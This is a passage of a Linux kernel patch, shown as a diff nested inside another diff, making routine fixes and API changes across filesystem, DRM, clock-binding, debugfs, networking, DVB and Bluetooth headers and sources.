+@@ -438,7 +438,7 @@ static unsigned sysv_nblocks(struct super_block *s, loff_t size)
+ 		res += blocks;
+ 		direct = 1;
+ 	}
+-	return blocks;
++	return res;
+ }
+ 
+ int sysv_getattr(struct user_namespace *mnt_userns, const struct path *path,
+diff --git a/fs/udf/namei.c b/fs/udf/namei.c
+index ae7bc13a5298a..7c95c549dd64e 100644
+--- a/fs/udf/namei.c
++++ b/fs/udf/namei.c
+@@ -1091,8 +1091,9 @@ static int udf_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 		return -EINVAL;
+ 
+ 	ofi = udf_find_entry(old_dir, &old_dentry->d_name, &ofibh, &ocfi);
+-	if (IS_ERR(ofi)) {
+-		retval = PTR_ERR(ofi);
++	if (!ofi || IS_ERR(ofi)) {
++		if (IS_ERR(ofi))
++			retval = PTR_ERR(ofi);
+ 		goto end_rename;
+ 	}
+ 
+@@ -1101,8 +1102,7 @@ static int udf_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 
+ 	brelse(ofibh.sbh);
+ 	tloc = lelb_to_cpu(ocfi.icb.extLocation);
+-	if (!ofi || udf_get_lb_pblock(old_dir->i_sb, &tloc, 0)
+-	    != old_inode->i_ino)
++	if (udf_get_lb_pblock(old_dir->i_sb, &tloc, 0) != old_inode->i_ino)
+ 		goto end_rename;
+ 
+ 	nfi = udf_find_entry(new_dir, &new_dentry->d_name, &nfibh, &ncfi);
+diff --git a/fs/xattr.c b/fs/xattr.c
+index 61107b6bbed29..427b8cea1f968 100644
+--- a/fs/xattr.c
++++ b/fs/xattr.c
+@@ -1140,7 +1140,7 @@ static int xattr_list_one(char **buffer, ssize_t *remaining_size,
+ ssize_t simple_xattr_list(struct inode *inode, struct simple_xattrs *xattrs,
+ 			  char *buffer, size_t size)
+ {
+-	bool trusted = capable(CAP_SYS_ADMIN);
++	bool trusted = ns_capable_noaudit(&init_user_ns, CAP_SYS_ADMIN);
+ 	struct simple_xattr *xattr;
+ 	ssize_t remaining_size = size;
+ 	int err = 0;
+diff --git a/include/drm/drm_connector.h b/include/drm/drm_connector.h
+index 56aee949c6fa2..4d830fc55a3df 100644
+--- a/include/drm/drm_connector.h
++++ b/include/drm/drm_connector.h
+@@ -656,6 +656,12 @@ struct drm_display_info {
+ 	 * @mso_pixel_overlap: eDP MSO segment pixel overlap, 0-8 pixels.
+ 	 */
+ 	u8 mso_pixel_overlap;
++
++	/**
++	 * @max_dsc_bpp: Maximum DSC target bitrate, if it is set to 0 the
++	 * monitor's default value is used instead.
++	 */
++	u32 max_dsc_bpp;
+ };
+ 
+ int drm_display_info_set_bus_formats(struct drm_display_info *info,
+diff --git a/include/drm/ttm/ttm_tt.h b/include/drm/ttm/ttm_tt.h
+index 17a0310e8aaaf..b7d3f3843f1e6 100644
+--- a/include/drm/ttm/ttm_tt.h
++++ b/include/drm/ttm/ttm_tt.h
+@@ -88,7 +88,7 @@ struct ttm_tt {
+ #define TTM_TT_FLAG_EXTERNAL		(1 << 2)
+ #define TTM_TT_FLAG_EXTERNAL_MAPPABLE	(1 << 3)
+ 
+-#define TTM_TT_FLAG_PRIV_POPULATED  (1 << 31)
++#define TTM_TT_FLAG_PRIV_POPULATED  (1U << 31)
+ 	uint32_t page_flags;
+ 	/** @num_pages: Number of pages in the page array. */
+ 	uint32_t num_pages;
+diff --git a/include/dt-bindings/clock/imx8mn-clock.h b/include/dt-bindings/clock/imx8mn-clock.h
+index 07b8a282c2682..04809edab33cf 100644
+--- a/include/dt-bindings/clock/imx8mn-clock.h
++++ b/include/dt-bindings/clock/imx8mn-clock.h
+@@ -16,40 +16,48 @@
+ #define IMX8MN_CLK_EXT4				7
+ #define IMX8MN_AUDIO_PLL1_REF_SEL		8
+ #define IMX8MN_AUDIO_PLL2_REF_SEL		9
+-#define IMX8MN_VIDEO_PLL1_REF_SEL		10
++#define IMX8MN_VIDEO_PLL_REF_SEL		10
++#define IMX8MN_VIDEO_PLL1_REF_SEL		IMX8MN_VIDEO_PLL_REF_SEL
+ #define IMX8MN_DRAM_PLL_REF_SEL			11
+ #define IMX8MN_GPU_PLL_REF_SEL			12
+-#define IMX8MN_VPU_PLL_REF_SEL			13
++#define IMX8MN_M7_ALT_PLL_REF_SEL		13
++#define IMX8MN_VPU_PLL_REF_SEL			IMX8MN_M7_ALT_PLL_REF_SEL
+ #define IMX8MN_ARM_PLL_REF_SEL			14
+ #define IMX8MN_SYS_PLL1_REF_SEL			15
+ #define IMX8MN_SYS_PLL2_REF_SEL			16
+ #define IMX8MN_SYS_PLL3_REF_SEL			17
+ #define IMX8MN_AUDIO_PLL1			18
+ #define IMX8MN_AUDIO_PLL2			19
+-#define IMX8MN_VIDEO_PLL1			20
++#define IMX8MN_VIDEO_PLL			20
++#define IMX8MN_VIDEO_PLL1			IMX8MN_VIDEO_PLL
+ #define IMX8MN_DRAM_PLL				21
+ #define IMX8MN_GPU_PLL				22
+-#define IMX8MN_VPU_PLL				23
++#define IMX8MN_M7_ALT_PLL			23
++#define IMX8MN_VPU_PLL				IMX8MN_M7_ALT_PLL
+ #define IMX8MN_ARM_PLL				24
+ #define IMX8MN_SYS_PLL1				25
+ #define IMX8MN_SYS_PLL2				26
+ #define IMX8MN_SYS_PLL3				27
+ #define IMX8MN_AUDIO_PLL1_BYPASS		28
+ #define IMX8MN_AUDIO_PLL2_BYPASS		29
+-#define IMX8MN_VIDEO_PLL1_BYPASS		30
++#define IMX8MN_VIDEO_PLL_BYPASS			30
++#define IMX8MN_VIDEO_PLL1_BYPASS		IMX8MN_VIDEO_PLL_BYPASS
+ #define IMX8MN_DRAM_PLL_BYPASS			31
+ #define IMX8MN_GPU_PLL_BYPASS			32
+-#define IMX8MN_VPU_PLL_BYPASS			33
++#define IMX8MN_M7_ALT_PLL_BYPASS		33
++#define IMX8MN_VPU_PLL_BYPASS			IMX8MN_M7_ALT_PLL_BYPASS
+ #define IMX8MN_ARM_PLL_BYPASS			34
+ #define IMX8MN_SYS_PLL1_BYPASS			35
+ #define IMX8MN_SYS_PLL2_BYPASS			36
+ #define IMX8MN_SYS_PLL3_BYPASS			37
+ #define IMX8MN_AUDIO_PLL1_OUT			38
+ #define IMX8MN_AUDIO_PLL2_OUT			39
+-#define IMX8MN_VIDEO_PLL1_OUT			40
++#define IMX8MN_VIDEO_PLL_OUT			40
++#define IMX8MN_VIDEO_PLL1_OUT			IMX8MN_VIDEO_PLL_OUT
+ #define IMX8MN_DRAM_PLL_OUT			41
+ #define IMX8MN_GPU_PLL_OUT			42
+-#define IMX8MN_VPU_PLL_OUT			43
++#define IMX8MN_M7_ALT_PLL_OUT			43
++#define IMX8MN_VPU_PLL_OUT			IMX8MN_M7_ALT_PLL_OUT
+ #define IMX8MN_ARM_PLL_OUT			44
+ #define IMX8MN_SYS_PLL1_OUT			45
+ #define IMX8MN_SYS_PLL2_OUT			46
+diff --git a/include/dt-bindings/clock/imx8mp-clock.h b/include/dt-bindings/clock/imx8mp-clock.h
+index 9d5cc2ddde896..1417b7b1b7dfe 100644
+--- a/include/dt-bindings/clock/imx8mp-clock.h
++++ b/include/dt-bindings/clock/imx8mp-clock.h
+@@ -324,8 +324,9 @@
+ #define IMX8MP_CLK_CLKOUT2_SEL			317
+ #define IMX8MP_CLK_CLKOUT2_DIV			318
+ #define IMX8MP_CLK_CLKOUT2			319
++#define IMX8MP_CLK_USB_SUSP			320
+ 
+-#define IMX8MP_CLK_END				320
++#define IMX8MP_CLK_END				321
+ 
+ #define IMX8MP_CLK_AUDIOMIX_SAI1_IPG		0
+ #define IMX8MP_CLK_AUDIOMIX_SAI1_MCLK1		1
+diff --git a/include/linux/btf_ids.h b/include/linux/btf_ids.h
+index 2aea877d644f8..2b98720084285 100644
+--- a/include/linux/btf_ids.h
++++ b/include/linux/btf_ids.h
+@@ -204,7 +204,7 @@ extern struct btf_id_set8 name;
+ 
+ #else
+ 
+-#define BTF_ID_LIST(name) static u32 __maybe_unused name[5];
++#define BTF_ID_LIST(name) static u32 __maybe_unused name[16];
+ #define BTF_ID(prefix, name)
+ #define BTF_ID_FLAGS(prefix, name, ...)
+ #define BTF_ID_UNUSED
+diff --git a/include/linux/debugfs.h b/include/linux/debugfs.h
+index f60674692d365..ea2d919fd9c79 100644
+--- a/include/linux/debugfs.h
++++ b/include/linux/debugfs.h
+@@ -45,7 +45,7 @@ struct debugfs_u32_array {
+ 
+ extern struct dentry *arch_debugfs_dir;
+ 
+-#define DEFINE_DEBUGFS_ATTRIBUTE(__fops, __get, __set, __fmt)		\
++#define DEFINE_DEBUGFS_ATTRIBUTE_XSIGNED(__fops, __get, __set, __fmt, __is_signed)	\
+ static int __fops ## _open(struct inode *inode, struct file *file)	\
+ {									\
+ 	__simple_attr_check_format(__fmt, 0ull);			\
+@@ -56,10 +56,16 @@ static const struct file_operations __fops = {				\
+ 	.open	 = __fops ## _open,					\
+ 	.release = simple_attr_release,					\
+ 	.read	 = debugfs_attr_read,					\
+-	.write	 = debugfs_attr_write,					\
++	.write	 = (__is_signed) ? debugfs_attr_write_signed : debugfs_attr_write,	\
+ 	.llseek  = no_llseek,						\
+ }
+ 
++#define DEFINE_DEBUGFS_ATTRIBUTE(__fops, __get, __set, __fmt)		\
++	DEFINE_DEBUGFS_ATTRIBUTE_XSIGNED(__fops, __get, __set, __fmt, false)
++
++#define DEFINE_DEBUGFS_ATTRIBUTE_SIGNED(__fops, __get, __set, __fmt)	\
++	DEFINE_DEBUGFS_ATTRIBUTE_XSIGNED(__fops, __get, __set, __fmt, true)
++
+ typedef struct vfsmount *(*debugfs_automount_t)(struct dentry *, void *);
+ 
+ #if defined(CONFIG_DEBUG_FS)
+@@ -102,6 +108,8 @@ ssize_t debugfs_attr_read(struct file *file, char __user *buf,
+ 			size_t len, loff_t *ppos);
+ ssize_t debugfs_attr_write(struct file *file, const char __user *buf,
+ 			size_t len, loff_t *ppos);
++ssize_t debugfs_attr_write_signed(struct file *file, const char __user *buf,
++			size_t len, loff_t *ppos);
+ 
+ struct dentry *debugfs_rename(struct dentry *old_dir, struct dentry *old_dentry,
+                 struct dentry *new_dir, const char *new_name);
+@@ -254,6 +262,13 @@ static inline ssize_t debugfs_attr_write(struct file *file,
+ 	return -ENODEV;
+ }
+ 
++static inline ssize_t debugfs_attr_write_signed(struct file *file,
++					const char __user *buf,
++					size_t len, loff_t *ppos)
++{
++	return -ENODEV;
++}
++
+ static inline struct dentry *debugfs_rename(struct dentry *old_dir, struct dentry *old_dentry,
+                 struct dentry *new_dir, char *new_name)
+ {
+diff --git a/include/linux/eventfd.h b/include/linux/eventfd.h
+index 30eb30d6909b0..3cd202d3eefb3 100644
+--- a/include/linux/eventfd.h
++++ b/include/linux/eventfd.h
+@@ -61,7 +61,7 @@ static inline struct eventfd_ctx *eventfd_ctx_fdget(int fd)
+ 	return ERR_PTR(-ENOSYS);
+ }
+ 
+-static inline int eventfd_signal(struct eventfd_ctx *ctx, int n)
++static inline int eventfd_signal(struct eventfd_ctx *ctx, __u64 n)
+ {
+ 	return -ENOSYS;
+ }
+diff --git a/include/linux/fortify-string.h b/include/linux/fortify-string.h
+index 1067a8450826b..5001a11258e4d 100644
+--- a/include/linux/fortify-string.h
++++ b/include/linux/fortify-string.h
+@@ -18,7 +18,7 @@ void __write_overflow_field(size_t avail, size_t wanted) __compiletime_warning("
+ 
+ #define __compiletime_strlen(p)					\
+ ({								\
+-	unsigned char *__p = (unsigned char *)(p);		\
++	char *__p = (char *)(p);				\
+ 	size_t __ret = SIZE_MAX;				\
+ 	size_t __p_size = __member_size(p);			\
+ 	if (__p_size != SIZE_MAX &&				\
+diff --git a/include/linux/fs.h b/include/linux/fs.h
+index 59ae95ddb6793..6b115bce14b98 100644
+--- a/include/linux/fs.h
++++ b/include/linux/fs.h
+@@ -3493,7 +3493,7 @@ void simple_transaction_set(struct file *file, size_t n);
+  * All attributes contain a text representation of a numeric value
+  * that are accessed with the get() and set() functions.
+  */
+-#define DEFINE_SIMPLE_ATTRIBUTE(__fops, __get, __set, __fmt)		\
++#define DEFINE_SIMPLE_ATTRIBUTE_XSIGNED(__fops, __get, __set, __fmt, __is_signed)	\
+ static int __fops ## _open(struct inode *inode, struct file *file)	\
+ {									\
+ 	__simple_attr_check_format(__fmt, 0ull);			\
+@@ -3504,10 +3504,16 @@ static const struct file_operations __fops = {				\
+ 	.open	 = __fops ## _open,					\
+ 	.release = simple_attr_release,					\
+ 	.read	 = simple_attr_read,					\
+-	.write	 = simple_attr_write,					\
++	.write	 = (__is_signed) ? simple_attr_write_signed : simple_attr_write,	\
+ 	.llseek	 = generic_file_llseek,					\
+ }
+ 
++#define DEFINE_SIMPLE_ATTRIBUTE(__fops, __get, __set, __fmt)		\
++	DEFINE_SIMPLE_ATTRIBUTE_XSIGNED(__fops, __get, __set, __fmt, false)
++
++#define DEFINE_SIMPLE_ATTRIBUTE_SIGNED(__fops, __get, __set, __fmt)	\
++	DEFINE_SIMPLE_ATTRIBUTE_XSIGNED(__fops, __get, __set, __fmt, true)
++
+ static inline __printf(1, 2)
+ void __simple_attr_check_format(const char *fmt, ...)
+ {
+@@ -3522,6 +3528,8 @@ ssize_t simple_attr_read(struct file *file, char __user *buf,
+ 			 size_t len, loff_t *ppos);
+ ssize_t simple_attr_write(struct file *file, const char __user *buf,
+ 			  size_t len, loff_t *ppos);
++ssize_t simple_attr_write_signed(struct file *file, const char __user *buf,
++				 size_t len, loff_t *ppos);
+ 
+ struct ctl_table;
+ int __init list_bdev_fs_names(char *buf, size_t size);
+diff --git a/include/linux/hisi_acc_qm.h b/include/linux/hisi_acc_qm.h
+index e230c7c46110a..c3618255b1504 100644
+--- a/include/linux/hisi_acc_qm.h
++++ b/include/linux/hisi_acc_qm.h
+@@ -384,14 +384,14 @@ struct hisi_qp {
+ static inline int q_num_set(const char *val, const struct kernel_param *kp,
+ 			    unsigned int device)
+ {
+-	struct pci_dev *pdev = pci_get_device(PCI_VENDOR_ID_HUAWEI,
+-					      device, NULL);
++	struct pci_dev *pdev;
+ 	u32 n, q_num;
+ 	int ret;
+ 
+ 	if (!val)
+ 		return -EINVAL;
+ 
++	pdev = pci_get_device(PCI_VENDOR_ID_HUAWEI, device, NULL);
+ 	if (!pdev) {
+ 		q_num = min_t(u32, QM_QNUM_V1, QM_QNUM_V2);
+ 		pr_info("No device found currently, suppose queue number is %u\n",
+@@ -401,6 +401,8 @@ static inline int q_num_set(const char *val, const struct kernel_param *kp,
+ 			q_num = QM_QNUM_V1;
+ 		else
+ 			q_num = QM_QNUM_V2;
++
++		pci_dev_put(pdev);
+ 	}
+ 
+ 	ret = kstrtou32(val, 10, &n);
+diff --git a/include/linux/hyperv.h b/include/linux/hyperv.h
+index 3b42264333ef8..646f1da9f27e0 100644
+--- a/include/linux/hyperv.h
++++ b/include/linux/hyperv.h
+@@ -1341,6 +1341,8 @@ struct hv_ring_buffer_debug_info {
+ int hv_ringbuffer_get_debuginfo(struct hv_ring_buffer_info *ring_info,
+ 				struct hv_ring_buffer_debug_info *debug_info);
+ 
++bool hv_ringbuffer_spinlock_busy(struct vmbus_channel *channel);
++
+ /* Vmbus interface */
+ #define vmbus_driver_register(driver)	\
+ 	__vmbus_driver_register(driver, THIS_MODULE, KBUILD_MODNAME)
+diff --git a/include/linux/ieee80211.h b/include/linux/ieee80211.h
+index 79690938d9a2d..d3088666f3f44 100644
+--- a/include/linux/ieee80211.h
++++ b/include/linux/ieee80211.h
+@@ -4594,7 +4594,7 @@ static inline u8 ieee80211_mle_common_size(const u8 *data)
+ 		return 0;
+ 	}
+ 
+-	return common + mle->variable[0];
++	return sizeof(*mle) + common + mle->variable[0];
+ }
+ 
+ /**
+diff --git a/include/linux/iio/imu/adis.h b/include/linux/iio/imu/adis.h
+index 515ca09764fe4..bcbefb7574751 100644
+--- a/include/linux/iio/imu/adis.h
++++ b/include/linux/iio/imu/adis.h
+@@ -402,9 +402,20 @@ static inline int adis_update_bits_base(struct adis *adis, unsigned int reg,
+ 	__adis_update_bits_base(adis, reg, mask, val, sizeof(val));	\
+ })
+ 
+-int adis_enable_irq(struct adis *adis, bool enable);
+ int __adis_check_status(struct adis *adis);
+ int __adis_initial_startup(struct adis *adis);
++int __adis_enable_irq(struct adis *adis, bool enable);
++
++static inline int adis_enable_irq(struct adis *adis, bool enable)
++{
++	int ret;
++
++	mutex_lock(&adis->state_lock);
++	ret = __adis_enable_irq(adis, enable);
++	mutex_unlock(&adis->state_lock);
++
++	return ret;
++}
+ 
+ static inline int adis_check_status(struct adis *adis)
+ {
+diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
+index eddf8ee270e74..ba2bd604359d4 100644
+--- a/include/linux/netdevice.h
++++ b/include/linux/netdevice.h
+@@ -171,31 +171,38 @@ static inline bool dev_xmit_complete(int rc)
+  *	(unsigned long) so they can be read and written atomically.
+  */
+ 
++#define NET_DEV_STAT(FIELD)			\
++	union {					\
++		unsigned long FIELD;		\
++		atomic_long_t __##FIELD;	\
++	}
++
+ struct net_device_stats {
+-	unsigned long	rx_packets;
+-	unsigned long	tx_packets;
+-	unsigned long	rx_bytes;
+-	unsigned long	tx_bytes;
+-	unsigned long	rx_errors;
+-	unsigned long	tx_errors;
+-	unsigned long	rx_dropped;
+-	unsigned long	tx_dropped;
+-	unsigned long	multicast;
+-	unsigned long	collisions;
+-	unsigned long	rx_length_errors;
+-	unsigned long	rx_over_errors;
+-	unsigned long	rx_crc_errors;
+-	unsigned long	rx_frame_errors;
+-	unsigned long	rx_fifo_errors;
+-	unsigned long	rx_missed_errors;
+-	unsigned long	tx_aborted_errors;
+-	unsigned long	tx_carrier_errors;
+-	unsigned long	tx_fifo_errors;
+-	unsigned long	tx_heartbeat_errors;
+-	unsigned long	tx_window_errors;
+-	unsigned long	rx_compressed;
+-	unsigned long	tx_compressed;
++	NET_DEV_STAT(rx_packets);
++	NET_DEV_STAT(tx_packets);
++	NET_DEV_STAT(rx_bytes);
++	NET_DEV_STAT(tx_bytes);
++	NET_DEV_STAT(rx_errors);
++	NET_DEV_STAT(tx_errors);
++	NET_DEV_STAT(rx_dropped);
++	NET_DEV_STAT(tx_dropped);
++	NET_DEV_STAT(multicast);
++	NET_DEV_STAT(collisions);
++	NET_DEV_STAT(rx_length_errors);
++	NET_DEV_STAT(rx_over_errors);
++	NET_DEV_STAT(rx_crc_errors);
++	NET_DEV_STAT(rx_frame_errors);
++	NET_DEV_STAT(rx_fifo_errors);
++	NET_DEV_STAT(rx_missed_errors);
++	NET_DEV_STAT(tx_aborted_errors);
++	NET_DEV_STAT(tx_carrier_errors);
++	NET_DEV_STAT(tx_fifo_errors);
++	NET_DEV_STAT(tx_heartbeat_errors);
++	NET_DEV_STAT(tx_window_errors);
++	NET_DEV_STAT(rx_compressed);
++	NET_DEV_STAT(tx_compressed);
+ };
++#undef NET_DEV_STAT
+ 
+ /* per-cpu stats, allocated on demand.
+  * Try to fit them in a single cache line, for dev_get_stats() sake.
+@@ -5164,4 +5171,9 @@ extern struct list_head ptype_base[PTYPE_HASH_SIZE] __read_mostly;
+ 
+ extern struct net_device *blackhole_netdev;
+ 
++/* Note: Avoid these macros in fast path, prefer per-cpu or per-queue counters. */
++#define DEV_STATS_INC(DEV, FIELD) atomic_long_inc(&(DEV)->stats.__##FIELD)
++#define DEV_STATS_ADD(DEV, FIELD, VAL) 	\
++		atomic_long_add((VAL), &(DEV)->stats.__##FIELD)
++
+ #endif	/* _LINUX_NETDEVICE_H */
+diff --git a/include/linux/proc_fs.h b/include/linux/proc_fs.h
+index 81d6e4ec2294b..0260f5ea98fe1 100644
+--- a/include/linux/proc_fs.h
++++ b/include/linux/proc_fs.h
+@@ -208,8 +208,10 @@ static inline void proc_remove(struct proc_dir_entry *de) {}
+ static inline int remove_proc_subtree(const char *name, struct proc_dir_entry *parent) { return 0; }
+ 
+ #define proc_create_net_data(name, mode, parent, ops, state_size, data) ({NULL;})
++#define proc_create_net_data_write(name, mode, parent, ops, write, state_size, data) ({NULL;})
+ #define proc_create_net(name, mode, parent, state_size, ops) ({NULL;})
+ #define proc_create_net_single(name, mode, parent, show, data) ({NULL;})
++#define proc_create_net_single_write(name, mode, parent, show, write, data) ({NULL;})
+ 
+ static inline struct pid *tgid_pidfd_to_pid(const struct file *file)
+ {
+diff --git a/include/linux/regulator/driver.h b/include/linux/regulator/driver.h
+index f9a7461e72b80..d3b4a3d4514ab 100644
+--- a/include/linux/regulator/driver.h
++++ b/include/linux/regulator/driver.h
+@@ -687,7 +687,8 @@ static inline int regulator_err2notif(int err)
+ 
+ 
+ struct regulator_dev *
+-regulator_register(const struct regulator_desc *regulator_desc,
++regulator_register(struct device *dev,
++		   const struct regulator_desc *regulator_desc,
+ 		   const struct regulator_config *config);
+ struct regulator_dev *
+ devm_regulator_register(struct device *dev,
+diff --git a/include/linux/skmsg.h b/include/linux/skmsg.h
+index 70d6cb94e5802..84f787416a54d 100644
+--- a/include/linux/skmsg.h
++++ b/include/linux/skmsg.h
+@@ -82,6 +82,7 @@ struct sk_psock {
+ 	u32				apply_bytes;
+ 	u32				cork_bytes;
+ 	u32				eval;
++	bool				redir_ingress; /* undefined if sk_redir is null */
+ 	struct sk_msg			*cork;
+ 	struct sk_psock_progs		progs;
+ #if IS_ENABLED(CONFIG_BPF_STREAM_PARSER)
+diff --git a/include/linux/timerqueue.h b/include/linux/timerqueue.h
+index 93884086f3924..adc80e29168ea 100644
+--- a/include/linux/timerqueue.h
++++ b/include/linux/timerqueue.h
+@@ -35,7 +35,7 @@ struct timerqueue_node *timerqueue_getnext(struct timerqueue_head *head)
+ {
+ 	struct rb_node *leftmost = rb_first_cached(&head->rb_root);
+ 
+-	return rb_entry(leftmost, struct timerqueue_node, node);
++	return rb_entry_safe(leftmost, struct timerqueue_node, node);
+ }
+ 
+ static inline void timerqueue_init(struct timerqueue_node *node)
+diff --git a/include/media/dvbdev.h b/include/media/dvbdev.h
+index 2f6b0861322ae..ac60c9fcfe9a6 100644
+--- a/include/media/dvbdev.h
++++ b/include/media/dvbdev.h
+@@ -126,6 +126,7 @@ struct dvb_adapter {
+  * struct dvb_device - represents a DVB device node
+  *
+  * @list_head:	List head with all DVB devices
++ * @ref:	reference counter
+  * @fops:	pointer to struct file_operations
+  * @adapter:	pointer to the adapter that holds this device node
+  * @type:	type of the device, as defined by &enum dvb_device_type.
+@@ -156,6 +157,7 @@ struct dvb_adapter {
+  */
+ struct dvb_device {
+ 	struct list_head list_head;
++	struct kref ref;
+ 	const struct file_operations *fops;
+ 	struct dvb_adapter *adapter;
+ 	enum dvb_device_type type;
+@@ -187,6 +189,20 @@ struct dvb_device {
+ 	void *priv;
+ };
+ 
++/**
++ * dvb_device_get - Increase dvb_device reference
++ *
++ * @dvbdev:	pointer to struct dvb_device
++ */
++struct dvb_device *dvb_device_get(struct dvb_device *dvbdev);
++
++/**
++ * dvb_device_put - Decrease dvb_device reference
++ *
++ * @dvbdev:	pointer to struct dvb_device
++ */
++void dvb_device_put(struct dvb_device *dvbdev);
++
+ /**
+  * dvb_register_adapter - Registers a new DVB adapter
+  *
+@@ -231,29 +247,17 @@ int dvb_register_device(struct dvb_adapter *adap,
+ /**
+  * dvb_remove_device - Remove a registered DVB device
+  *
+- * This does not free memory.  To do that, call dvb_free_device().
++ * This does not free memory. dvb_free_device() will do that when
++ * the reference count drops to zero.
+  *
+  * @dvbdev:	pointer to struct dvb_device
+  */
+ void dvb_remove_device(struct dvb_device *dvbdev);
+ 
+-/**
+- * dvb_free_device - Free memory occupied by a DVB device.
+- *
+- * Call dvb_unregister_device() before calling this function.
+- *
+- * @dvbdev:	pointer to struct dvb_device
+- */
+-void dvb_free_device(struct dvb_device *dvbdev);
+ 
+ /**
+  * dvb_unregister_device - Unregisters a DVB device
+  *
+- * This is a combination of dvb_remove_device() and dvb_free_device().
+- * Using this function is usually a mistake, and is often an indicator
+- * for a use-after-free bug (when a userspace process keeps a file
+- * handle to a detached device).
+- *
+  * @dvbdev:	pointer to struct dvb_device
+  */
+ void dvb_unregister_device(struct dvb_device *dvbdev);
+diff --git a/include/net/bluetooth/hci.h b/include/net/bluetooth/hci.h
+index 684f1cd287301..7a381fcef939d 100644
+--- a/include/net/bluetooth/hci.h
++++ b/include/net/bluetooth/hci.h
+@@ -274,6 +274,26 @@ enum {
+ 	 * during the hdev->setup vendor callback.
+ 	 */
+ 	HCI_QUIRK_BROKEN_ENHANCED_SETUP_SYNC_CONN,
++
++	/*
++	 * When this quirk is set, the HCI_OP_LE_SET_EXT_SCAN_ENABLE command is
++	 * disabled. This is required for some Broadcom controllers which
++	 * erroneously claim to support extended scanning.
++	 *
++	 * This quirk can be set before hci_register_dev is called or
++	 * during the hdev->setup vendor callback.
++	 */
++	HCI_QUIRK_BROKEN_EXT_SCAN,
++
++	/*
++	 * When this quirk is set, the HCI_OP_GET_MWS_TRANSPORT_CONFIG command is
++	 * disabled. This is required for some Broadcom controllers which
++	 * erroneously claim to support MWS Transport Layer Configuration.
++	 *
++	 * This quirk can be set before hci_register_dev is called or
++	 * during the hdev->setup vendor callback.
++	 */
++	HCI_QUIRK_BROKEN_MWS_TRANSPORT_CONFIG,
+ };
+ 
+ /* HCI device flags */
+diff --git a/include/net/bluetooth/hci_core.h b/include/net/bluetooth/hci_core.h
+index c54bc71254afa..7f585e5dd71b8 100644
+--- a/include/net/bluetooth/hci_core.h
++++ b/include/net/bluetooth/hci_core.h
+@@ -1689,7 +1689,9 @@ void hci_conn_del_sysfs(struct hci_conn *conn);
+ 
+ /* Use ext scanning if set ext scan param and ext scan enable is supported */
+ #define use_ext_scan(dev) (((dev)->commands[37] & 0x20) && \
+-			   ((dev)->commands[37] & 0x40))
++			   ((dev)->commands[37] & 0x40) && \
++			   !test_bit(HCI_QUIRK_BROKEN_EXT_SCAN, &(dev)->quirks))
++
+ /* Use ext create connection if command is supported */
+ #define use_ext_conn(dev) ((dev)->commands[37] & 0x80)
+ 
+@@ -1717,6 +1719,9 @@ void hci_conn_del_sysfs(struct hci_conn *conn);
+ 	((dev)->le_features[3] & HCI_LE_CIS_PERIPHERAL)
+ #define bis_capable(dev) ((dev)->le_features[3] & HCI_LE_ISO_BROADCASTER)
+ 
++#define mws_transport_config_capable(dev) (((dev)->commands[30] & 0x08) && \
++	(!test_bit(HCI_QUIRK_BROKEN_MWS_TRANSPORT_CONFIG, &(dev)->quirks)))
++
+ /* ----- HCI protocols ----- */
+ #define HCI_PROTO_DEFER             0x01
+ 
+diff --git a/include/net/dst.h b/include/net/dst.h
+index 00b479ce6b99c..d67fda89cd0fa 100644
+--- a/include/net/dst.h
++++ b/include/net/dst.h
+@@ -356,9 +356,8 @@ static inline void __skb_tunnel_rx(struct sk_buff *skb, struct net_device *dev,
+ static inline void skb_tunnel_rx(struct sk_buff *skb, struct net_device *dev,
+ 				 struct net *net)
+ {
+-	/* TODO : stats should be SMP safe */
+-	dev->stats.rx_packets++;
+-	dev->stats.rx_bytes += skb->len;
++	DEV_STATS_INC(dev, rx_packets);
++	DEV_STATS_ADD(dev, rx_bytes, skb->len);
+ 	__skb_tunnel_rx(skb, dev, net);
+ }
+ 
+diff --git a/include/net/ip_vs.h b/include/net/ip_vs.h
+index ff1804a0c4692..1fca6a88114ad 100644
+--- a/include/net/ip_vs.h
++++ b/include/net/ip_vs.h
+@@ -351,11 +351,11 @@ struct ip_vs_seq {
+ 
+ /* counters per cpu */
+ struct ip_vs_counters {
+-	__u64		conns;		/* connections scheduled */
+-	__u64		inpkts;		/* incoming packets */
+-	__u64		outpkts;	/* outgoing packets */
+-	__u64		inbytes;	/* incoming bytes */
+-	__u64		outbytes;	/* outgoing bytes */
++	u64_stats_t	conns;		/* connections scheduled */
++	u64_stats_t	inpkts;		/* incoming packets */
++	u64_stats_t	outpkts;	/* outgoing packets */
++	u64_stats_t	inbytes;	/* incoming bytes */
++	u64_stats_t	outbytes;	/* outgoing bytes */
+ };
+ /* Stats per cpu */
+ struct ip_vs_cpu_stats {
+diff --git a/include/net/mrp.h b/include/net/mrp.h
+index 92cd3fb6cf9da..b28915ffea284 100644
+--- a/include/net/mrp.h
++++ b/include/net/mrp.h
+@@ -124,6 +124,7 @@ struct mrp_applicant {
+ 	struct sk_buff		*pdu;
+ 	struct rb_root		mad;
+ 	struct rcu_head		rcu;
++	bool			active;
+ };
+ 
+ struct mrp_port {
+diff --git a/include/net/sock_reuseport.h b/include/net/sock_reuseport.h
+index efc9085c68927..6ec140b0a61bf 100644
+--- a/include/net/sock_reuseport.h
++++ b/include/net/sock_reuseport.h
+@@ -16,6 +16,7 @@ struct sock_reuseport {
+ 	u16			max_socks;		/* length of socks */
+ 	u16			num_socks;		/* elements in socks */
+ 	u16			num_closed_socks;	/* closed elements in socks */
++	u16			incoming_cpu;
+ 	/* The last synq overflow event timestamp of this
+ 	 * reuse->socks[] group.
+ 	 */
+@@ -58,5 +59,6 @@ static inline bool reuseport_has_conns(struct sock *sk)
+ }
+ 
+ void reuseport_has_conns_set(struct sock *sk);
++void reuseport_update_incoming_cpu(struct sock *sk, int val);
+ 
+ #endif  /* _SOCK_REUSEPORT_H */
+diff --git a/include/net/tcp.h b/include/net/tcp.h
+index 14d45661a84d8..5b70b241ce71b 100644
+--- a/include/net/tcp.h
++++ b/include/net/tcp.h
+@@ -2291,8 +2291,8 @@ int tcp_bpf_update_proto(struct sock *sk, struct sk_psock *psock, bool restore);
+ void tcp_bpf_clone(const struct sock *sk, struct sock *newsk);
+ #endif /* CONFIG_BPF_SYSCALL */
+ 
+-int tcp_bpf_sendmsg_redir(struct sock *sk, struct sk_msg *msg, u32 bytes,
+-			  int flags);
++int tcp_bpf_sendmsg_redir(struct sock *sk, bool ingress,
